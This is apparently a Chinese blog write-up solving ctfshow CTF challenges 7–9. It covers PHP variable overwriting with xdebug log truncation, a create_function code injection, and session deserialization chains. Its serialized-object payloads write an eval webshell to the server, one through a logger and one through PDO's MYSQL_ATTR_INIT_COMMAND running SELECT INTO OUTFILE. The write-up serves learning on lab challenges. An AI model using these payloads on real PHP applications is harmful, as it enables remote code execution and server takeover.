前言：

最近一直在搞java很少刷题，看见ctfshow的活动赶紧来复现一波~

ctfshow 红包挑战7

<?php
highlight_file(__FILE__);
error_reporting(2);
extract($_GET);
ini_set($name,$value);
system(
    "ls '".filter($_GET[1])."'"
);

function filter($cmd){
    $cmd = str_replace("'","",$cmd);
    $cmd = str_replace("\\","",$cmd);
    $cmd = str_replace("`","",$cmd);
    $cmd = str_replace("$","",$cmd);
    return $cmd;
}

代码很简单就是一个替换操作，然后一个system命令执行，变量覆盖还没想到如何利用

而且如果传参；则里面会显示 ls ';'，所以猜测肯定是要闭合引号、或者注释字符这种

然后只能显示 ls /这种，没法截断和注释

（flag近在眼前，我却得不到。。。）

只能去看佬们的文章了

先查看扩展插件

?1=/usr/local/lib/php/extensions/no-debug-non-zts-20180731/

知识点：

xdebug在处理截断问题的时候，会将异常payload回显。而system刚好可以用0字节（%00或者\000）进行截断来触发异常。

(涨知识了，第一次见这种通过修改报错日志的路径，然后利用截断报错写入日志

红包挑战8

<?php


highlight_file(__FILE__);
error_reporting(0);

extract($_GET);
create_function($name,base64_encode($value))();

那么肯定是考察create_function的用法，$name和value的值可控，但是value经过了base64编码，所以着重利用$name

先回忆一下create_function的作用

<?php


$action="\create_function";
$arg="){}var_dump(scandir(\"../\"));//";
$action($arg,'');
echo ($arg);

发现这篇文章的payload就能通，为啥早点没看懂。。。

JYcxk($name)

{ base64_encode($value) }

payload就相当于

JYcxk(){}

var_dump(scandir(\"../\"));

注释掉了后面，然后直接var_dump执行

红包挑战9

已经给出了源码那就直接分析

发现index.php中的注册可以跳转到

有file_put_contents方法，当时想的是能否用phar反序列化然后用C绕过wakeup,但是生成的那么一堆数据直接传肯定是不行呀。

然后接着看，发现了很多关于session的操作

1、session里面存放对象时，会自动进行序列化，存放序列化后的字符串
2、session里面拿取对象时，会自动进行反序列化，执行对象的魔术方法

session_decode（$_GET)正好是序列化的操作，$data=$_SESSION['user']是反序列化的操作

看哪里调用了getLoginName，发现在index.php中不符合前面的条件就会包含main.php，

因为在

需要getCookie=NULL,所以需要在用户名中加一个|这样就不等于2，会返回null

实际测试，

发现序列化成功修改了文件，本来想直接修改filename然后反序列化，用C代替O绕过wakeup发现是不可行的。

思路

就是绕过wakeup不就可以自定义那个值了嘛，或者找个提前结束的东西

这里发现了一个die，那么让它执行到die，就会不执行wakeup直接执行destruct

然后就是构造这条链子

application::__destruct -->application::log_last_user-->mysql_helper

<?php
class mysql_helper{
    private $db;
}
class application{
    public $debug=true;
    public $loger;
    public $mysql;
    public function __construct(){
        $this->loger = new userLogger();
        $this->mysql = new mysql_helper();
    }
}
class userLogger{

    public $username='<?php eval($_POST[1]);phpinfo();?>';
    public $password="123456";
    public $filename="2.php";
}
$a = new application();
echo serialize($a);

看了师傅们的第二种方法是通过PDO数据库做的

果然，没见过的东西都有trick

题目应该是开启了PDO扩展（common.php中的mysql_helper类），用来连接数据库。

PHP中文手册->PDO_MYSQL预定义常量。查询到一个预定义常量叫PDO::MYSQL_ATTR_INIT_COMMAND。

它的描述翻译过来是：连接MySQL服务器时执行的命令（SQL语句）。将在重新连接时自动重新执行。注意，这个常量只能在构造一个新的数据库句柄时在driver_options数组中使用。

很纳闷我去php 手册找的时候，找不到这个常量（很奇怪）

既然能执行sql语句，

select '<?php eval($_POST[1]);phpinfo();?>' into outfile '/var/www/html/1.php';

和上面基本一样也是调用pdo，只不过不用绕过wakeup了

<?php
session_start();
class mysql_helper
{
    public $option = array(
        PDO::MYSQL_ATTR_INIT_COMMAND => "select '<?php eval(\$_POST[1]);phpinfo();?>'  into outfile '/var/www/html/1.php';"
    );
}
class application
{
    public $mysql;
    public $debug = true;

    public function __construct()
    {
        $this->mysql = new mysql_helper();
    }
}

$a = new application();
echo urlencode(serialize($a));